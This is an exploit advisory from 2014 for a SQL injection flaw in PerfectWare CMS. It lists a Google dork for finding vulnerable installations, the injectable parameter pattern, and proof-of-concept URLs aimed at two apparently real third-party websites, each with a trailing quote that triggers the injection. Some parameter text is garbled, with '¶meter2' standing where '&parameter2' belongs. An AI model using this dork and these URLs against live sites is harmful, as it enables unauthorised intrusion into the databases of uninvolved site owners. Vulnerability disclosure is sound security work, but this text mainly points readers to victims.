# PerfectWare CMS SQL Injection
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 09/05/2014
# Vendor Homepage: http://www.perfectware.com.br/ (Robson Gutierrez)
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intext:Desenvolvimento By Robson Gutierrez
# Url vul : http://host/?parameter1=ID_1¶meter2=[SQLI]
# Exploit:
Post exploit = ¶meter2=[SQLI]
# PoC : http://renovaautocenter.com.br/?conteudo=servicos&menu=geometria'
http://decoracaohortifruti.com.br/?conteudo=videos&id=59'